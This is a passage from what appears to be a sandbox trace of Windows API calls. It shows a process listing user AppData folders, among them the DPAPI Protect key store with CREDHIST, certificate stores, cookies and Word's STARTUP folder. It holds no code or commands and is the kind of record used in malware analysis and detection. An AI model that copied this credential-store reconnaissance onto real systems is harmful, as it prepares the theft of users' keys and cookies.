lpOldMode=0x38ef20) returned 1 [0207.604] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Protect", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Protect", lpFilePart=0x0) returned 0x34 [0207.604] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Protect\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x30b088f0, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x30b088f0, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0207.605] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x30b088f0, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x30b088f0, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.605] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x79a044b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79a044b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x47b8e1c0, ftLastWriteTime.dwHighDateTime=0x1d7a944, nFileSizeHigh=0x0, nFileSizeLow=0x1c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="CREDHIST", cAlternateFileName="")) returned 1 [0207.605] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3111613574-2524581245-2586426736-500", cAlternateFileName="S-1-5-~1")) returned 1 [0207.605] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x30b088f0, ftCreationTime.dwHighDateTime=0x1d7100d, ftLastAccessTime.dwLowDateTime=0x510a9850, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x510a9850, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-4219442223-4223814209-3835049652-1000", cAlternateFileName="S-1-5-~2")) returned 1 [0207.605] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7bba3b70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7bba3b70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x47bf4a60, ftLastWriteTime.dwHighDateTime=0x1d7a944, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SYNCHIST", cAlternateFileName="")) returned 1 [0207.605] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0207.605] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0207.605] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0207.605] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0207.605] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\SystemCertificates", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\SystemCertificates", lpFilePart=0x0) returned 0x3f [0207.605] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0207.605] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\SystemCertificates", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\SystemCertificates", lpFilePart=0x0) returned 0x3f [0207.606] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0207.607] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.607] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795d9e30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My", cAlternateFileName="")) returned 1 [0207.607] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795d9e30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My", cAlternateFileName="")) returned 0 [0207.607] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0207.607] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0207.607] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0207.607] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Templates", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Templates", lpFilePart=0x0) returned 0x36 [0207.607] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0207.607] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Templates", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Templates", lpFilePart=0x0) returned 0x36 [0207.608] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Templates\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x21509730, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3e1d8b20, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x3e1d8b20, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0207.608] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x21509730, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3e1d8b20, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x3e1d8b20, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.608] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2b354e30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b354e30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b4aba90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x4615, dwReserved0=0x0, dwReserved1=0x0, cFileName="Normal.dotm", cAlternateFileName="NORMAL~1.DOT")) returned 1 [0207.608] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0207.609] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0207.609] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0207.609] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0207.609] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\UProof", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\UProof", lpFilePart=0x0) returned 0x33 [0207.609] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0207.610] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\UProof", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\UProof", lpFilePart=0x0) returned 0x33 [0207.610] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\UProof\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x426ba7c0, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0207.611] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x426ba7c0, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.611] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x426ba7c0, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426e0920, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="CUSTOM.DIC", cAlternateFileName="")) returned 1 [0207.611] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0207.611] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0207.611] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0207.611] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0207.612] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows", lpFilePart=0x0) returned 0x34 [0207.612] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0207.612] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows", lpFilePart=0x0) returned 0x34 [0207.612] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0207.612] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.613] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x76abed20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x76abed20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0207.613] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7958db70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IECompatCache", cAlternateFileName="IECOMP~1")) returned 1 [0207.613] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe9256a4, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IETldCache", cAlternateFileName="IETLDC~1")) returned 1 [0207.613] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7e87ab80, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e87ab80, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0207.613] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xaeeef71c, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network Shortcuts", cAlternateFileName="NETWOR~1")) returned 1 [0207.613] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xb9c40b55, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Printer Shortcuts", cAlternateFileName="PRINTE~1")) returned 1 [0207.613] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x75cc2be0, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x75cc2be0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrivacIE", cAlternateFileName="")) returned 1 [0207.613] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795418b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xa3e54ba0, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xa3e54ba0, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0207.614] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x795418b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf9b7c855, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0207.614] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7951b750, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e803170, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0207.614] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x794f55f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xaef15879, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0207.614] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xef632f84, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Themes", cAlternateFileName="")) returned 1 [0207.614] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xef632f84, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Themes", cAlternateFileName="")) returned 0 [0207.614] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0207.614] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0207.614] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0207.615] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Word", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Word", lpFilePart=0x0) returned 0x31 [0207.615] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0207.615] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Word", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Word", lpFilePart=0x0) returned 0x31 [0207.615] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Word\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x286ff470, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x286ff470, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x286ff470, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0207.616] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x286ff470, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x286ff470, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x286ff470, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.616] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x286ff470, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x286ff470, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x286ff470, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="STARTUP", cAlternateFileName="")) returned 1 [0207.616] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x286ff470, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x286ff470, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x286ff470, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="STARTUP", cAlternateFileName="")) returned 0 [0207.616] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0207.616] 